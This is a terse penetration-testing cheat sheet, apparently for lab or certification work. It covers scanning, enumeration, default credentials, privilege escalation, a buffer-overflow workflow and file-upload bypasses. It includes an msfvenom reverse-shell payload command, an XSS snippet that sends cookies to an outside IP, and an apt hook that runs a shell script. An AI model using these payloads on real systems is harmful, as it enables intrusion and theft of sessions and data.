(Soon will be moved to my gitbook)
- first, test the potential vuln (or each step of it) by minimum cost
nmap -sC -sV -oA <name> <ip>nmap -p- -sV <ip> > all-tcpnmap -sU <ip> > comm-udpnmap --script vuln <ip>nc -zv xx.xx.xx.xx 1-100 2>&1 | grep -v "refused"
gobuster -u http://xxxxx -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html- remember to recursively scan if needed
- google its software version and find its exploit
- login page => google its default cred
- play around and see whether there is any upload/execute vuln
- check its ssl cert information, it may contain some username or email
- play with PHPSESSID, reuse it, to see what happens
https://gist.github.com/feng-zhe/fc78b1f01b6ce6c26dd7a6ebc909953d
https://gist.github.com/feng-zhe/e75d0c2c918c9edf50b27eb4d489b15f
https://gist.github.com/feng-zhe/e6bc151aa96132b3cc4e03b5a858e80c
https://gist.github.com/feng-zhe/68efdd66fd20fd4626fe82e3f92d6e2b
https://gist.github.com/feng-zhe/3f7c802df4b47bc9d70eeb8bdbd190e8
snmpwalk -c public -v1 <target>snmp-check -w -t 30 <target>
- go to /var/www/, read config => get db cred => extract juicy info
- password reuse
- find SUID files =>
find / -perm -4000 2>/dev/null - find all files in /home =>
find /home -type f - LinEnum.sh, linux-exploit-suggester.sh, linuxprivchecker.py
- ps scripts
- manually enum
- runas attack
- service replace
- If using MSF, try to migrate to a x64 process and run local_exploit_suggest.
- admin:admin
- admin:password
- admin:Password1
- guest:guest
- exitfool xx => find hidden info, like author, email
- smb share
- (kali)
impacket-smbserver share <shared path> - (windows)
net use z: \\<kali's ip>\share - (windows)
copy <file\ z:
- (kali)
r < <(python exp.py)- (or 'set args' if take parameters)
r < input.txtreadelf -s /lib/i386-linux-gnu/libc.so.6 | grep exitstrings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep '/bin/sh'p system=> address of function systeminfo functions=> list all functionsvmmap=> find which part is executable.
- find EIP overflow offset
msf-pattern_create -l 300msf-pattern_offset -q <value>
- test bad chars
!mona modules- see modules and their security flags. we also need to make sure the module address doesn't contain bad chars.
- click the "e" button to see the list of executable modules. Double click on one to view its assembly code.
- find "jmp esp" commands
- right click -> search for -> command, then enter "jmp esp"(or others).
- right click -> search for -> sequence of commands, then enter "push esp", new line, "ret".
- if no DEP is enabled, we can search beyond the .text section where the "search for" commands focus. We can search other sections.
msf-nasm_shelland enter "jmp esp", it says "FFE4"- `!mona find -s "\xff\xe4" -m xxx.dll
- you can click the button "->|" (except the | are dots)
- place shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker ip> LPORT=<attacker port> -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
- odat.py
--sysdbato get a
<script>
document.write('<img src="http://10.10.14.19/xxxx?cookie=' + document.cookie + '" />')
</script>
- jpg.php, php.jpg, php5, php6, php7
- use system filename length limits to truncate the .png part from .php.png
- /usr/bin/find replaced by /usr/bin/fin? or /usr/bin/\f\i\n\d
If apt update is run, the scripts in /etc/apt/apt.conf.d/ also gets run.
So, if there is a job running apt update, we can put a file with following content under /etc/apt/apt.conf.d/:
APT::Update::Pre-Invoke {"/bin/bash /tmp/myshell.sh"}
https://gist.github.com/feng-zhe/5429965db99d9647ffc60bb571c6f46e
https://gist.github.com/feng-zhe/ffc2063f138a4321c3cb45c9fdab5e46